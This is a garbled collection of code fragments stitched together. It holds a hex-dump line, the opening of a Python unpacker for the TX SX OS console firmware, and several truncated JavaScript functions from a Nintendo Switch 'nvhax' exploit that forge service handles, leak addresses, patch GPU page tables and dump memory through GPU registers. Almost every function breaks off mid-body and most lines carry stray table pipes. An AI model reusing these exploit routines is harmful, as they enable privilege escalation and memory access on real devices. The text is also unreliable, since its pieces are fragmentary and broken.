0D40AC6C 20 00 BC 0E 46 93 46 9D 47 08 00 00 |
############################################### | |
# TX SX OS unpacker - by hexkyz and naehrwert # | |
############################################### | |
from Crypto.Cipher import AES | |
from Crypto.Util import Counter | |
import os | |
import struct | |
""" |
# The following is adapted from https://github.com/reswitched/loaders/blob/master/nxo64.py | |
# | |
# =========================================================================================== | |
# | |
# Copyright 2017 Reswitched Team | |
# | |
# Permission to use, copy, modify, and/or distribute this software for any purpose with or | |
# without fee is hereby granted, provided that the above copyright notice and this permission | |
# notice appear in all copies. | |
# |
sploitcore.prototype.send_request = function(srv_handle, type, domain_id, cmd_id, params, dump_reply, show_log) { | |
var req_buf = this.malloc(0x1000); | |
if (show_log) | |
utils.log('Request buf: ' + utils.paddr(req_buf)); | |
var request_reply = [0, 0]; | |
var err_code = [0, 0]; | |
// One handle and 2 words input type |
sploitcore.prototype.nvdrv_sharedmem_leak = function(nvdrv_buf, dev_handle) { | |
var temp_buf = this.malloc(0x1000); | |
var nvdrv_ioctl = this.bridge(0x1A247C, types.int, types.void_p, types.int, types.int, types.void_p, types.void_p, types.void_p); | |
// Setup buffers | |
var in_buf_ioctl = utils.add2(temp_buf, 0x000); | |
var out_buf_ioctl = utils.add2(temp_buf, 0x100); | |
var out_buf_status = utils.add2(temp_buf, 0x200); | |
var in_buf = utils.add2(temp_buf, 0x800); | |
var out_buf = utils.add2(temp_buf, 0x900); |
sploitcore.prototype.break_nvdrv = function(sm_handle) { | |
var meminfo = this.malloc(0x20); | |
var pageinfo = this.malloc(0x8); | |
// Leak nvservices base address | |
var nvdrv_base = this.get_nvdrv_base(sm_handle); | |
// Forge a new service handle for NVDRV | |
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t"); | |
/* | |
nvhax exploit | |
*/ | |
// Global nvservices exploit context.
// NOTE(review): this object is assigned on sploitcore.prototype, so it is a single
// mutable object shared by every sploitcore instance rather than per-instance state;
// any write through one instance is visible to all others. It is read by numeric
// index elsewhere in this file (e.g. this.nvdrv_exp_ctx[6] in nvhax_find_channel);
// the code that populates it is not visible here (presumably spawn_nvdrv_srv) — verify.
sploitcore.prototype.nvdrv_exp_ctx = {}; | |
sploitcore.prototype.spawn_nvdrv_srv = function(sm_handle, transf_mem_addr, transf_mem_size) { | |
// Forge a new service handle for NVDRV | |
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t"); | |
sploitcore.prototype.nvhax_find_channel = function(hw_num) { | |
var mem_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40000); | |
var page_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40100); | |
var test_addr = [0, 0]; | |
var ch_base_addr = [0, 0]; | |
// Look for user channel | |
while (test_addr[1] < 0x80) | |
{ | |
var result = this.nvhax_svc(0x06, [mem_info_addr, page_info_addr, test_addr], [], false); |
sploitcore.prototype.nvhax_patch_channel = function(ch_base_addr, target_paddr) { | |
// Map GPU MMIO | |
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000); | |
// Page directory is always at channel + 0x15000 | |
var pdb_vaddr = utils.add2(ch_base_addr, 0x15000); | |
// Read page directory base IOVA | |
var pdb_iova_lo = this.nvhax_read32(utils.add2(ch_base_addr, 0x200)); | |
var pdb_iova_hi = this.nvhax_read32(utils.add2(ch_base_addr, 0x204)); |
sploitcore.prototype.nvhax_peephole_dump_mem = function(ch_iova, gpu_va, mem_size) { | |
// Map GPU MMIO | |
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000); | |
// Write the channel's iova in PEEPHOLE PBUS register | |
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova)); | |
// Write the GPU virtual address in PEEPHOLE registers | |
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]); | |
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]); |